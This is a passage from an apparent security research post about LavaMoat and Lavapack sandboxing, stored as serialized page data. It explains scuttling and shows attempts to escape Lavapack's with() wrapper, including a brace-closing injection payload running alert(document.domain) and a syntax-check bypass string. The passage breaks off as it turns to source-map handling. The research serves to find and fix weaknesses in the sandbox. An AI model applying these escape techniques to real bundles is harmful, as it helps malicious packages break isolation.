package.",{"type":27,"tag":36,"props":54784,"children":54785},{},[54786,54788,54795],{"type":33,"value":54787},"Instead, Lavamoat looks at how each package is connected by ",{"type":27,"tag":47,"props":54789,"children":54792},{"href":54790,"rel":54791},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/walk.js#L22",[51],[54793],{"type":33,"value":54794},"walking the modules",{"type":33,"value":54796}," in a project's dependency tree, thus generating a unique name for each package.",{"type":27,"tag":26163,"props":54798,"children":54800},{"id":54799},"scuttling",[54801],{"type":33,"value":54398},{"type":27,"tag":36,"props":54803,"children":54804},{},[54805,54807,54813],{"type":33,"value":54806},"Scuttling is an optional feature that adds an extra layer of protection. Even if the real ",{"type":27,"tag":84,"props":54808,"children":54810},{"className":54809},[],[54811],{"type":33,"value":54812},"GlobalThis",{"type":33,"value":54814}," object is leaked by an attacker or accessed through a malicious package manager, scuttling removes sensitive APIs, preventing malicious requests from being executed.",{"type":27,"tag":36,"props":54816,"children":54817},{},[54818,54820,54827],{"type":33,"value":54819},"For example, ",{"type":27,"tag":47,"props":54821,"children":54824},{"href":54822,"rel":54823},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L57",[51],[54825],{"type":33,"value":54826},"here",{"type":33,"value":54828}," we see how Lavamoat checks if the feature is enabled after the root package compartment is created:",{"type":27,"tag":101,"props":54830,"children":54832},{"className":201,"code":54831,"language":200,"meta":7,"style":7}," if (scuttleOpts.enabled) {\n if (!Array.isArray(scuttleOpts.exceptions)) {\n throw new Error(`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"${typeof scuttleOpts.exceptions}\"`)\n }\n scuttleOpts.scuttlerFunc(globalRef, realm => performScuttleGlobalThis(realm, scuttleOpts.exceptions))\n }\n",[54833],{"type":27,"tag":84,"props":54834,"children":54835},{"__ignoreMap":7},[54836,54865,54915,54974,54981,55053],{"type":27,"tag":207,"props":54837,"children":54838},{"class":209,"line":210},[54839,54843,54847,54852,54856,54861],{"type":27,"tag":207,"props":54840,"children":54841},{"style":376},[54842],{"type":33,"value":19556},{"type":27,"tag":207,"props":54844,"children":54845},{"style":238},[54846],{"type":33,"value":686},{"type":27,"tag":207,"props":54848,"children":54849},{"style":220},[54850],{"type":33,"value":54851},"scuttleOpts",{"type":27,"tag":207,"props":54853,"children":54854},{"style":238},[54855],{"type":33,"value":1041},{"type":27,"tag":207,"props":54857,"children":54858},{"style":220},[54859],{"type":33,"value":54860},"enabled",{"type":27,"tag":207,"props":54862,"children":54863},{"style":238},[54864],{"type":33,"value":1424},{"type":27,"tag":207,"props":54866,"children":54867},{"class":209,"line":244},[54868,54872,54876,54880,54885,54889,54894,54898,54902,54906,54911],{"type":27,"tag":207,"props":54869,"children":54870},{"style":376},[54871],{"type":33,"value":46532},{"type":27,"tag":207,"props":54873,"children":54874},{"style":238},[54875],{"type":33,"value":686},{"type":27,"tag":207,"props":54877,"children":54878},{"style":226},[54879],{"type":33,"value":27893},{"type":27,"tag":207,"props":54881,"children":54882},{"style":220},[54883],{"type":33,"value":54884},"Array",{"type":27,"tag":207,"props":54886,"children":54887},{"style":238},[54888],{"type":33,"value":1041},{"type":27,"tag":207,"props":54890,"children":54891},{"style":1335},[54892],{"type":33,"value":54893},"isArray",{"type":27,"tag":207,"props":54895,"children":54896},{"style":238},[54897],{"type":33,"value":1343},{"type":27,"tag":207,"props":54899,"children":54900},{"style":220},[54901],{"type":33,"value":54851},{"type":27,"tag":207,"props":54903,"children":54904},{"style":238},[54905],{"type":33,"value":1041},{"type":27,"tag":207,"props":54907,"children":54908},{"style":220},[54909],{"type":33,"value":54910},"exceptions",{"type":27,"tag":207,"props":54912,"children":54913},{"style":238},[54914],{"type":33,"value":8955},{"type":27,"tag":207,"props":54916,"children":54917},{"class":209,"line":270},[54918,54923,54927,54931,54935,54940,54944,54948,54953,54957,54961,54965,54970],{"type":27,"tag":207,"props":54919,"children":54920},{"style":376},[54921],{"type":33,"value":54922}," throw",{"type":27,"tag":207,"props":54924,"children":54925},{"style":214},[54926],{"type":33,"value":1597},{"type":27,"tag":207,"props":54928,"children":54929},{"style":1335},[54930],{"type":33,"value":47528},{"type":27,"tag":207,"props":54932,"children":54933},{"style":238},[54934],{"type":33,"value":1343},{"type":27,"tag":207,"props":54936,"children":54937},{"style":1325},[54938],{"type":33,"value":54939},"`LavaMoat - scuttleGlobalThis.exceptions must be an array, got \"",{"type":27,"tag":207,"props":54941,"children":54942},{"style":214},[54943],{"type":33,"value":41364},{"type":27,"tag":207,"props":54945,"children":54946},{"style":214},[54947],{"type":33,"value":38663},{"type":27,"tag":207,"props":54949,"children":54950},{"style":220},[54951],{"type":33,"value":54952}," scuttleOpts",{"type":27,"tag":207,"props":54954,"children":54955},{"style":226},[54956],{"type":33,"value":1041},{"type":27,"tag":207,"props":54958,"children":54959},{"style":220},[54960],{"type":33,"value":54910},{"type":27,"tag":207,"props":54962,"children":54963},{"style":214},[54964],{"type":33,"value":41396},{"type":27,"tag":207,"props":54966,"children":54967},{"style":1325},[54968],{"type":33,"value":54969},"\"`",{"type":27,"tag":207,"props":54971,"children":54972},{"style":238},[54973],{"type":33,"value":10449},{"type":27,"tag":207,"props":54975,"children":54976},{"class":209,"line":296},[54977],{"type":27,"tag":207,"props":54978,"children":54979},{"style":238},[54980],{"type":33,"value":19941},{"type":27,"tag":207,"props":54982,"children":54983},{"class":209,"line":445},[54984,54989,54993,54998,55002,55007,55011,55016,55020,55025,55029,55033,55037,55041,55045,55049],{"type":27,"tag":207,"props":54985,"children":54986},{"style":220},[54987],{"type":33,"value":54988}," scuttleOpts",{"type":27,"tag":207,"props":54990,"children":54991},{"style":238},[54992],{"type":33,"value":1041},{"type":27,"tag":207,"props":54994,"children":54995},{"style":1335},[54996],{"type":33,"value":54997},"scuttlerFunc",{"type":27,"tag":207,"props":54999,"children":55000},{"style":238},[55001],{"type":33,"value":1343},{"type":27,"tag":207,"props":55003,"children":55004},{"style":220},[55005],{"type":33,"value":55006},"globalRef",{"type":27,"tag":207,"props":55008,"children":55009},{"style":238},[55010],{"type":33,"value":1123},{"type":27,"tag":207,"props":55012,"children":55013},{"style":220},[55014],{"type":33,"value":55015},"realm",{"type":27,"tag":207,"props":55017,"children":55018},{"style":214},[55019],{"type":33,"value":35018},{"type":27,"tag":207,"props":55021,"children":55022},{"style":1335},[55023],{"type":33,"value":55024}," performScuttleGlobalThis",{"type":27,"tag":207,"props":55026,"children":55027},{"style":238},[55028],{"type":33,"value":1343},{"type":27,"tag":207,"props":55030,"children":55031},{"style":220},[55032],{"type":33,"value":55015},{"type":27,"tag":207,"props":55034,"children":55035},{"style":238},[55036],{"type":33,"value":1123},{"type":27,"tag":207,"props":55038,"children":55039},{"style":220},[55040],{"type":33,"value":54851},{"type":27,"tag":207,"props":55042,"children":55043},{"style":238},[55044],{"type":33,"value":1041},{"type":27,"tag":207,"props":55046,"children":55047},{"style":220},[55048],{"type":33,"value":54910},{"type":27,"tag":207,"props":55050,"children":55051},{"style":238},[55052],{"type":33,"value":26983},{"type":27,"tag":207,"props":55054,"children":55055},{"class":209,"line":867},[55056],{"type":27,"tag":207,"props":55057,"children":55058},{"style":238},[55059],{"type":33,"value":10645},{"type":27,"tag":36,"props":55061,"children":55062},{},[55063,55065,55071,55073,55079],{"type":33,"value":55064},"Subsequently, the code defines a ",{"type":27,"tag":47,"props":55066,"children":55069},{"href":55067,"rel":55068},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L74",[51],[55070],{"type":33,"value":38637},{"type":33,"value":55072}," called ",{"type":27,"tag":84,"props":55074,"children":55076},{"className":55075},[],[55077],{"type":33,"value":55078},"generateScuttleOpts",{"type":33,"value":55080}," that creates and returns an options object.",{"type":27,"tag":36,"props":55082,"children":55083},{},[55084,55086,55092,55093,55099,55101,55106,55108,55114],{"type":33,"value":55085},"Finally, the ",{"type":27,"tag":84,"props":55087,"children":55089},{"className":55088},[],[55090],{"type":33,"value":55091},"performScuttleGlobalThis",{"type":33,"value":13740},{"type":27,"tag":47,"props":55094,"children":55097},{"href":55095,"rel":55096},"https://github.com/LavaMoat/LavaMoat/blob/f3e53c8c44f063f000adc620b0aa3f7a41dda5c6/packages/core/src/scuttle.js#L125",[51],[55098],{"type":33,"value":38637},{"type":33,"value":55100}," modifies the properties of the global object (",{"type":27,"tag":84,"props":55102,"children":55104},{"className":55103},[],[55105],{"type":33,"value":55006},{"type":33,"value":55107},"). It starts by creating an array ",{"type":27,"tag":84,"props":55109,"children":55111},{"className":55110},[],[55112],{"type":33,"value":55113},"props",{"type":33,"value":55115},", containing the names of all properties in the prototype chain of globalRef. Then, an empty object is then created to serve as a proxy for scuttled properties. The function then iterates over each property, making changes to the global window object based on the provided configuration.",{"type":27,"tag":28,"props":55117,"children":55119},{"id":55118},"hacking-webpacks",[55120],{"type":33,"value":55121},"Hacking Webpacks",{"type":27,"tag":36,"props":55123,"children":55124},{},[55125],{"type":33,"value":55126},"Now let's get to the fun stuff.",{"type":27,"tag":36,"props":55128,"children":55129},{},[55130],{"type":33,"value":55131},"Webpack is used to bundle all modules and packages into a single file. It inserts all the code of these modules into the bundle file. Checking Lavapack source code, we can see how this actually happens.",{"type":27,"tag":101,"props":55133,"children":55135},{"className":201,"code":55134,"language":200,"meta":7,"style":7}," const filename = encodeURI(String(moduleData.file))\n let moduleWrapperSource\n if (bundleWithPrecompiledModules) {\n moduleWrapperSource = `function(){\n with (this.scopeTerminator) {\n with (this.globalThis) {\n return function() {\n 'use strict';\n // source: ${filename}\n return function (require, module, exports) {\n __MODULE_CONTENT__\n };\n };\n }\n }\n }`\n",[55136],{"type":27,"tag":84,"props":55137,"children":55138},{"__ignoreMap":7},[55139,55190,55202,55222,55239,55247,55255,55263,55271,55292,55300,55308,55316,55323,55330,55337],{"type":27,"tag":207,"props":55140,"children":55141},{"class":209,"line":210},[55142,55146,55151,55155,55160,55164,55168,55172,55177,55181,55186],{"type":27,"tag":207,"props":55143,"children":55144},{"style":214},[55145],{"type":33,"value":2333},{"type":27,"tag":207,"props":55147,"children":55148},{"style":220},[55149],{"type":33,"value":55150}," filename",{"type":27,"tag":207,"props":55152,"children":55153},{"style":226},[55154],{"type":33,"value":229},{"type":27,"tag":207,"props":55156,"children":55157},{"style":1335},[55158],{"type":33,"value":55159}," encodeURI",{"type":27,"tag":207,"props":55161,"children":55162},{"style":238},[55163],{"type":33,"value":1343},{"type":27,"tag":207,"props":55165,"children":55166},{"style":1335},[55167],{"type":33,"value":8863},{"type":27,"tag":207,"props":55169,"children":55170},{"style":238},[55171],{"type":33,"value":1343},{"type":27,"tag":207,"props":55173,"children":55174},{"style":220},[55175],{"type":33,"value":55176},"moduleData",{"type":27,"tag":207,"props":55178,"children":55179},{"style":238},[55180],{"type":33,"value":1041},{"type":27,"tag":207,"props":55182,"children":55183},{"style":220},[55184],{"type":33,"value":55185},"file",{"type":27,"tag":207,"props":55187,"children":55188},{"style":238},[55189],{"type":33,"value":26983},{"type":27,"tag":207,"props":55191,"children":55192},{"class":209,"line":244},[55193,55197],{"type":27,"tag":207,"props":55194,"children":55195},{"style":214},[55196],{"type":33,"value":425},{"type":27,"tag":207,"props":55198,"children":55199},{"style":220},[55200],{"type":33,"value":55201}," moduleWrapperSource\n",{"type":27,"tag":207,"props":55203,"children":55204},{"class":209,"line":270},[55205,55209,55213,55218],{"type":27,"tag":207,"props":55206,"children":55207},{"style":376},[55208],{"type":33,"value":38654},{"type":27,"tag":207,"props":55210,"children":55211},{"style":238},[55212],{"type":33,"value":686},{"type":27,"tag":207,"props":55214,"children":55215},{"style":220},[55216],{"type":33,"value":55217},"bundleWithPrecompiledModules",{"type":27,"tag":207,"props":55219,"children":55220},{"style":238},[55221],{"type":33,"value":1424},{"type":27,"tag":207,"props":55223,"children":55224},{"class":209,"line":296},[55225,55230,55234],{"type":27,"tag":207,"props":55226,"children":55227},{"style":220},[55228],{"type":33,"value":55229}," moduleWrapperSource",{"type":27,"tag":207,"props":55231,"children":55232},{"style":226},[55233],{"type":33,"value":229},{"type":27,"tag":207,"props":55235,"children":55236},{"style":1325},[55237],{"type":33,"value":55238}," `function(){\n",{"type":27,"tag":207,"props":55240,"children":55241},{"class":209,"line":445},[55242],{"type":27,"tag":207,"props":55243,"children":55244},{"style":1325},[55245],{"type":33,"value":55246}," with (this.scopeTerminator) {\n",{"type":27,"tag":207,"props":55248,"children":55249},{"class":209,"line":867},[55250],{"type":27,"tag":207,"props":55251,"children":55252},{"style":1325},[55253],{"type":33,"value":55254}," with (this.globalThis) {\n",{"type":27,"tag":207,"props":55256,"children":55257},{"class":209,"line":892},[55258],{"type":27,"tag":207,"props":55259,"children":55260},{"style":1325},[55261],{"type":33,"value":55262}," return function() {\n",{"type":27,"tag":207,"props":55264,"children":55265},{"class":209,"line":1475},[55266],{"type":27,"tag":207,"props":55267,"children":55268},{"style":1325},[55269],{"type":33,"value":55270}," 'use strict';\n",{"type":27,"tag":207,"props":55272,"children":55273},{"class":209,"line":2065},[55274,55279,55283,55288],{"type":27,"tag":207,"props":55275,"children":55276},{"style":1325},[55277],{"type":33,"value":55278}," // source: ",{"type":27,"tag":207,"props":55280,"children":55281},{"style":214},[55282],{"type":33,"value":41364},{"type":27,"tag":207,"props":55284,"children":55285},{"style":220},[55286],{"type":33,"value":55287},"filename",{"type":27,"tag":207,"props":55289,"children":55290},{"style":214},[55291],{"type":33,"value":451},{"type":27,"tag":207,"props":55293,"children":55294},{"class":209,"line":2092},[55295],{"type":27,"tag":207,"props":55296,"children":55297},{"style":1325},[55298],{"type":33,"value":55299}," return function (require, module, exports) {\n",{"type":27,"tag":207,"props":55301,"children":55302},{"class":209,"line":2130},[55303],{"type":27,"tag":207,"props":55304,"children":55305},{"style":1325},[55306],{"type":33,"value":55307}," __MODULE_CONTENT__\n",{"type":27,"tag":207,"props":55309,"children":55310},{"class":209,"line":2168},[55311],{"type":27,"tag":207,"props":55312,"children":55313},{"style":1325},[55314],{"type":33,"value":55315}," };\n",{"type":27,"tag":207,"props":55317,"children":55318},{"class":209,"line":4095},[55319],{"type":27,"tag":207,"props":55320,"children":55321},{"style":1325},[55322],{"type":33,"value":15983},{"type":27,"tag":207,"props":55324,"children":55325},{"class":209,"line":4103},[55326],{"type":27,"tag":207,"props":55327,"children":55328},{"style":1325},[55329],{"type":33,"value":10637},{"type":27,"tag":207,"props":55331,"children":55332},{"class":209,"line":4154},[55333],{"type":27,"tag":207,"props":55334,"children":55335},{"style":1325},[55336],{"type":33,"value":19941},{"type":27,"tag":207,"props":55338,"children":55339},{"class":209,"line":4203},[55340],{"type":27,"tag":207,"props":55341,"children":55342},{"style":1325},[55343],{"type":33,"value":55344}," }`\n",{"type":27,"tag":36,"props":55346,"children":55347},{},[55348,55350,55356,55358,55364],{"type":33,"value":55349},"Lavapack uses ",{"type":27,"tag":84,"props":55351,"children":55353},{"className":55352},[],[55354],{"type":33,"value":55355},"with()",{"type":33,"value":55357}," proxies to restrict the objects accessible by the module, and ",{"type":27,"tag":84,"props":55359,"children":55361},{"className":55360},[],[55362],{"type":33,"value":55363},"__MODULE_CONTENT__",{"type":33,"value":55365}," is replaced by the content of a file required by the project being built.",{"type":27,"tag":58,"props":55367,"children":55369},{"id":55368},"injection-not-so-simple",[55370],{"type":33,"value":55371},"Injection? Not So Simple",{"type":27,"tag":36,"props":55373,"children":55374},{},[55375,55377,55382],{"type":33,"value":55376},"We first tried to inject invalid javascript inside a javascript file, and then attempt to escape the ",{"type":27,"tag":84,"props":55378,"children":55380},{"className":55379},[],[55381],{"type":33,"value":19928},{"type":33,"value":55383}," environment:",{"type":27,"tag":101,"props":55385,"children":55387},{"className":201,"code":55386,"language":200,"meta":7,"style":7}," } // end function 1\n } // end function 2\n } // end with 1\n} // end with 2\n\nalert(document.domain)\n",[55388],{"type":27,"tag":84,"props":55389,"children":55390},{"__ignoreMap":7},[55391,55404,55416,55428,55440,55447],{"type":27,"tag":207,"props":55392,"children":55393},{"class":209,"line":210},[55394,55399],{"type":27,"tag":207,"props":55395,"children":55396},{"style":238},[55397],{"type":33,"value":55398}," } ",{"type":27,"tag":207,"props":55400,"children":55401},{"style":4647},[55402],{"type":33,"value":55403},"// end function 1\n",{"type":27,"tag":207,"props":55405,"children":55406},{"class":209,"line":244},[55407,55411],{"type":27,"tag":207,"props":55408,"children":55409},{"style":238},[55410],{"type":33,"value":38728},{"type":27,"tag":207,"props":55412,"children":55413},{"style":4647},[55414],{"type":33,"value":55415},"// end function 2\n",{"type":27,"tag":207,"props":55417,"children":55418},{"class":209,"line":270},[55419,55423],{"type":27,"tag":207,"props":55420,"children":55421},{"style":238},[55422],{"type":33,"value":43452},{"type":27,"tag":207,"props":55424,"children":55425},{"style":4647},[55426],{"type":33,"value":55427},"// end with 1\n",{"type":27,"tag":207,"props":55429,"children":55430},{"class":209,"line":296},[55431,55435],{"type":27,"tag":207,"props":55432,"children":55433},{"style":238},[55434],{"type":33,"value":408},{"type":27,"tag":207,"props":55436,"children":55437},{"style":4647},[55438],{"type":33,"value":55439},"// end with 2\n",{"type":27,"tag":207,"props":55441,"children":55442},{"class":209,"line":445},[55443],{"type":27,"tag":207,"props":55444,"children":55445},{"emptyLinePlaceholder":19},[55446],{"type":33,"value":2062},{"type":27,"tag":207,"props":55448,"children":55449},{"class":209,"line":867},[55450,55454,55458,55462,55466,55470],{"type":27,"tag":207,"props":55451,"children":55452},{"style":1335},[55453],{"type":33,"value":39955},{"type":27,"tag":207,"props":55455,"children":55456},{"style":238},[55457],{"type":33,"value":1343},{"type":27,"tag":207,"props":55459,"children":55460},{"style":220},[55461],{"type":33,"value":39965},{"type":27,"tag":207,"props":55463,"children":55464},{"style":238},[55465],{"type":33,"value":1041},{"type":27,"tag":207,"props":55467,"children":55468},{"style":220},[55469],{"type":33,"value":39975},{"type":27,"tag":207,"props":55471,"children":55472},{"style":238},[55473],{"type":33,"value":10449},{"type":27,"tag":36,"props":55475,"children":55476},{},[55477,55479,55485,55487,55494],{"type":33,"value":55478},"However, when we tried to bundle it, a ",{"type":27,"tag":84,"props":55480,"children":55482},{"className":55481},[],[55483],{"type":33,"value":55484},"ParseError",{"type":33,"value":55486}," was thrown. This is because Lavapack is a plugin of ",{"type":27,"tag":47,"props":55488,"children":55491},{"href":55489,"rel":55490},"https://github.com/browserify/browserify",[51],[55492],{"type":33,"value":55493},"browserify",{"type":33,"value":55495},", which has a syntax check before replacing the code.",{"type":27,"tag":36,"props":55497,"children":55498},{},[55499,55501,55507,55509,55515,55517,55523,55525,55530],{"type":33,"value":55500},"Looking deeper into browserify, we find it has a ",{"type":27,"tag":84,"props":55502,"children":55504},{"className":55503},[],[55505],{"type":33,"value":55506},"syntax",{"type":33,"value":55508}," stage on it's pipeline, and uses the ",{"type":27,"tag":84,"props":55510,"children":55512},{"className":55511},[],[55513],{"type":33,"value":55514},"syntax-error",{"type":33,"value":55516}," npm package to validate the syntax of each javascript file content. Since Lavapack replaces the ",{"type":27,"tag":84,"props":55518,"children":55520},{"className":55519},[],[55521],{"type":33,"value":55522},"pack",{"type":33,"value":55524}," stage on browserify pipeline, which comes after the ",{"type":27,"tag":84,"props":55526,"children":55528},{"className":55527},[],[55529],{"type":33,"value":55506},{"type":33,"value":55531},", it was not possible to inject invalid javascript to escape the Lavamoat sandbox.",{"type":27,"tag":36,"props":55533,"children":55534},{},[55535],{"type":27,"tag":126,"props":55536,"children":55539},{"alt":55537,"src":55538},"Pipeline","/posts/supply-chain-attacks-a-new-era/pipeline.png",[],{"type":27,"tag":36,"props":55541,"children":55542},{},[55543,55544,55549,55551,55556],{"type":33,"value":23888},{"type":27,"tag":84,"props":55545,"children":55547},{"className":55546},[],[55548],{"type":33,"value":55514},{"type":33,"value":55550}," package performs a syntax check by using ",{"type":27,"tag":84,"props":55552,"children":55554},{"className":55553},[],[55555],{"type":33,"value":8871},{"type":33,"value":55557}," with function hoisting:",{"type":27,"tag":101,"props":55559,"children":55561},{"className":201,"code":55560,"language":200,"meta":7,"style":7},"try {\n eval('throw \"STOP\"; (function () { ' + src + '\\n})()');\n return;\n}\ncatch (err) {\n if (err === 'STOP') return undefined;\n if (err.constructor.name !== 'SyntaxError') return err;\n return errorInfo(src, file, opts);\n}\n",[55562],{"type":27,"tag":84,"props":55563,"children":55564},{"__ignoreMap":7},[55565,55576,55626,55637,55644,55664,55705,55765,55806],{"type":27,"tag":207,"props":55566,"children":55567},{"class":209,"line":210},[55568,55572],{"type":27,"tag":207,"props":55569,"children":55570},{"style":376},[55571],{"type":33,"value":379},{"type":27,"tag":207,"props":55573,"children":55574},{"style":238},[55575],{"type":33,"value":384},{"type":27,"tag":207,"props":55577,"children":55578},{"class":209,"line":244},[55579,55584,55588,55593,55597,55602,55606,55611,55617,55622],{"type":27,"tag":207,"props":55580,"children":55581},{"style":1335},[55582],{"type":33,"value":55583}," eval",{"type":27,"tag":207,"props":55585,"children":55586},{"style":238},[55587],{"type":33,"value":1343},{"type":27,"tag":207,"props":55589,"children":55590},{"style":1325},[55591],{"type":33,"value":55592},"'throw \"STOP\"; (function () { '",{"type":27,"tag":207,"props":55594,"children":55595},{"style":226},[55596],{"type":33,"value":1374},{"type":27,"tag":207,"props":55598,"children":55599},{"style":220},[55600],{"type":33,"value":55601}," src",{"type":27,"tag":207,"props":55603,"children":55604},{"style":226},[55605],{"type":33,"value":1374},{"type":27,"tag":207,"props":55607,"children":55608},{"style":1325},[55609],{"type":33,"value":55610}," '",{"type":27,"tag":207,"props":55612,"children":55614},{"style":55613},"--shiki-default:#D7BA7D",[55615],{"type":33,"value":55616},"\\n",{"type":27,"tag":207,"props":55618,"children":55619},{"style":1325},[55620],{"type":33,"value":55621},"})()'",{"type":27,"tag":207,"props":55623,"children":55624},{"style":238},[55625],{"type":33,"value":1455},{"type":27,"tag":207,"props":55627,"children":55628},{"class":209,"line":270},[55629,55633],{"type":27,"tag":207,"props":55630,"children":55631},{"style":376},[55632],{"type":33,"value":8986},{"type":27,"tag":207,"props":55634,"children":55635},{"style":238},[55636],{"type":33,"value":241},{"type":27,"tag":207,"props":55638,"children":55639},{"class":209,"line":296},[55640],{"type":27,"tag":207,"props":55641,"children":55642},{"style":238},[55643],{"type":33,"value":451},{"type":27,"tag":207,"props":55645,"children":55646},{"class":209,"line":445},[55647,55651,55655,55660],{"type":27,"tag":207,"props":55648,"children":55649},{"style":376},[55650],{"type":33,"value":413},{"type":27,"tag":207,"props":55652,"children":55653},{"style":238},[55654],{"type":33,"value":686},{"type":27,"tag":207,"props":55656,"children":55657},{"style":220},[55658],{"type":33,"value":55659},"err",{"type":27,"tag":207,"props":55661,"children":55662},{"style":238},[55663],{"type":33,"value":1424},{"type":27,"tag":207,"props":55665,"children":55666},{"class":209,"line":867},[55667,55671,55675,55679,55683,55688,55692,55697,55701],{"type":27,"tag":207,"props":55668,"children":55669},{"style":376},[55670],{"type":33,"value":19556},{"type":27,"tag":207,"props":55672,"children":55673},{"style":238},[55674],{"type":33,"value":686},{"type":27,"tag":207,"props":55676,"children":55677},{"style":220},[55678],{"type":33,"value":55659},{"type":27,"tag":207,"props":55680,"children":55681},{"style":226},[55682],{"type":33,"value":38682},{"type":27,"tag":207,"props":55684,"children":55685},{"style":1325},[55686],{"type":33,"value":55687}," 'STOP'",{"type":27,"tag":207,"props":55689,"children":55690},{"style":238},[55691],{"type":33,"value":2222},{"type":27,"tag":207,"props":55693,"children":55694},{"style":376},[55695],{"type":33,"value":55696},"return",{"type":27,"tag":207,"props":55698,"children":55699},{"style":214},[55700],{"type":33,"value":46583},{"type":27,"tag":207,"props":55702,"children":55703},{"style":238},[55704],{"type":33,"value":241},{"type":27,"tag":207,"props":55706,"children":55707},{"class":209,"line":892},[55708,55712,55716,55720,55724,55729,55733,55738,55743,55748,55752,55756,55761],{"type":27,"tag":207,"props":55709,"children":55710},{"style":376},[55711],{"type":33,"value":19556},{"type":27,"tag":207,"props":55713,"children":55714},{"style":238},[55715],{"type":33,"value":686},{"type":27,"tag":207,"props":55717,"children":55718},{"style":220},[55719],{"type":33,"value":55659},{"type":27,"tag":207,"props":55721,"children":55722},{"style":238},[55723],{"type":33,"value":1041},{"type":27,"tag":207,"props":55725,"children":55726},{"style":220},[55727],{"type":33,"value":55728},"constructor",{"type":27,"tag":207,"props":55730,"children":55731},{"style":238},[55732],{"type":33,"value":1041},{"type":27,"tag":207,"props":55734,"children":55735},{"style":220},[55736],{"type":33,"value":55737},"name",{"type":27,"tag":207,"props":55739,"children":55740},{"style":226},[55741],{"type":33,"value":55742}," !==",{"type":27,"tag":207,"props":55744,"children":55745},{"style":1325},[55746],{"type":33,"value":55747}," 'SyntaxError'",{"type":27,"tag":207,"props":55749,"children":55750},{"style":238},[55751],{"type":33,"value":2222},{"type":27,"tag":207,"props":55753,"children":55754},{"style":376},[55755],{"type":33,"value":55696},{"type":27,"tag":207,"props":55757,"children":55758},{"style":220},[55759],{"type":33,"value":55760}," err",{"type":27,"tag":207,"props":55762,"children":55763},{"style":238},[55764],{"type":33,"value":241},{"type":27,"tag":207,"props":55766,"children":55767},{"class":209,"line":1475},[55768,55772,55777,55781,55785,55789,55793,55797,55802],{"type":27,"tag":207,"props":55769,"children":55770},{"style":376},[55771],{"type":33,"value":8986},{"type":27,"tag":207,"props":55773,"children":55774},{"style":1335},[55775],{"type":33,"value":55776}," errorInfo",{"type":27,"tag":207,"props":55778,"children":55779},{"style":238},[55780],{"type":33,"value":1343},{"type":27,"tag":207,"props":55782,"children":55783},{"style":220},[55784],{"type":33,"value":39927},{"type":27,"tag":207,"props":55786,"children":55787},{"style":238},[55788],{"type":33,"value":1123},{"type":27,"tag":207,"props":55790,"children":55791},{"style":220},[55792],{"type":33,"value":55185},{"type":27,"tag":207,"props":55794,"children":55795},{"style":238},[55796],{"type":33,"value":1123},{"type":27,"tag":207,"props":55798,"children":55799},{"style":220},[55800],{"type":33,"value":55801},"opts",{"type":27,"tag":207,"props":55803,"children":55804},{"style":238},[55805],{"type":33,"value":1455},{"type":27,"tag":207,"props":55807,"children":55808},{"class":209,"line":2065},[55809],{"type":27,"tag":207,"props":55810,"children":55811},{"style":238},[55812],{"type":33,"value":451},{"type":27,"tag":36,"props":55814,"children":55815},{},[55816,55818,55822,55824,55830,55832,55837],{"type":33,"value":55817},"Interestingly, it ",{"type":27,"tag":942,"props":55819,"children":55820},{},[55821],{"type":33,"value":11257},{"type":33,"value":55823}," possible to inject a ",{"type":27,"tag":84,"props":55825,"children":55827},{"className":55826},[],[55828],{"type":33,"value":55829},"}); (() => {",{"type":33,"value":55831}," inside source, and will not throw a syntax error. Unfortunately, this is not enough to bypass the ",{"type":27,"tag":84,"props":55833,"children":55835},{"className":55834},[],[55836],{"type":33,"value":55355},{"type":33,"value":55838}," sandbox of Lavapack.",{"type":27,"tag":58,"props":55840,"children":55842},{"id":55841},"sourcemap-the-syntax-killer",[55843],{"type":33,"value":55844},"SourceMap: The Syntax Killer",{"type":27,"tag":36,"props":55846,"children":55847},{},[55848,55850,55857],{"type":33,"value":55849},"Lavapack has a feature to extract source maps files from the code using ",{"type":27,"tag":47,"props":55851,"children":55854},{"href":55852,"rel":55853},"https://www.npmjs.com/package/convert-source-map",[51],[55855],{"type":33,"value":55856},"convert-source-map",{"type":33,"value":55858}," npm package:",{"type":27,"tag":101,"props":55860,"children":55862},{"className":201,"code":55861,"language":200,"meta":7,"style":7},"function extractSourceMaps(sourceCode) {\n const converter = convertSourceMap.fromSource(sourceCode)\n // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n const maps = converter && converter.toObject()\n const code = convertSourceMap.removeComments(sourceCode)\n return { code, maps }\n}\n",[55863],{"type":27,"tag":84,"props":55864,"children":55865},{"__ignoreMap":7},[55866,55890,55932,55940,55981,56022,56050],{"type":27,"tag":207,"props":55867,"children":55868},{"class":209,"line":210},[55869,55873,55878,55882,55886],{"type":27,"tag":207,"props":55870,"children":55871},{"style":214},[55872],{"type":33,"value":38637},{"type":27,"tag":207,"props":55874,"children":55875},{"style":1335},[55876],{"type":33,"value":55877}," extractSourceMaps",{"type":27,"tag":207,"props":55879,"children":55880},{"style":238},[55881],{"type":33,"value":1343},{"type":27,"tag":207,"props":55883,"children":55884},{"style":220},[55885],{"type":33,"value":45261},{"type":27,"tag":207,"props":55887,"children":55888},{"style":238},[55889],{"type":33,"value":1424},{"type":27,"tag":207,"props":55891,"children":55892},{"class":209,"line":244},[55893,55897,55902,55906,55911,55915,55920,55924,55928],{"type":27,"tag":207,"props":55894,"children":55895},{"style":214},[55896],{"type":33,"value":2333},{"type":27,"tag":207,"props":55898,"children":55899},{"style":220},[55900],{"type":33,"value":55901}," converter",{"type":27,"tag":207,"props":55903,"children":55904},{"style":226},[55905],{"type":33,"value":229},{"type":27,"tag":207,"props":55907,"children":55908},{"style":220},[55909],{"type":33,"value":55910}," convertSourceMap",{"type":27,"tag":207,"props":55912,"children":55913},{"style":238},[55914],{"type":33,"value":1041},{"type":27,"tag":207,"props":55916,"children":55917},{"style":1335},[55918],{"type":33,"value":55919},"fromSource",{"type":27,"tag":207,"props":55921,"children":55922},{"style":238},[55923],{"type":33,"value":1343},{"type":27,"tag":207,"props":55925,"children":55926},{"style":220},[55927],{"type":33,"value":45261},{"type":27,"tag":207,"props":55929,"children":55930},{"style":238},[55931],{"type":33,"value":10449},{"type":27,"tag":207,"props":55933,"children":55934},{"class":209,"line":270},[55935],{"type":27,"tag":207,"props":55936,"children":55937},{"style":4647},[55938],{"type":33,"value":55939}," // if 